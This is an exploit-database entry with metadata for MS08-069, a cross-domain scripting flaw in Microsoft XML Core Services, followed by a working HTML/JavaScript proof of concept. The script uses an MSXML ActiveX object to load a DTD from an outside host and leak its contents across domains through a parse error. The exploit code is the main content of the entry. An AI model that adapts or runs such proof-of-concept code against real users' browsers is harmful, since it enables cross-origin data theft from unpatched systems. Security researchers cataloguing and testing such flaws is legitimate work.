Microsoft XML Core Services DTD - Cross-Domain Scripting (MS08-069)

Author: Jerome Athias
type: remote
platform: windows
port: 
date_added: 2008-11-22  
date_updated:   
verified: 1  
codes: OSVDB-50279;CVE-2008-4033;OSVDB-49926;CVE-2008-4029;MS08-069  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7196.html  
<html>
<body>
KB955218 - CVE-2008-4029 - JA
<script type="text/javascript">
var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
dom.async = false;
var url = "http://www.milw0rm.com/forfun.dtd";
var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
if (dom.loadXML(xml) == 0)
{
	alert("Blue or Red Pill? " + dom.parseError.srcText);
}
</script>
</body>
</html>

# milw0rm.com [2008-11-23]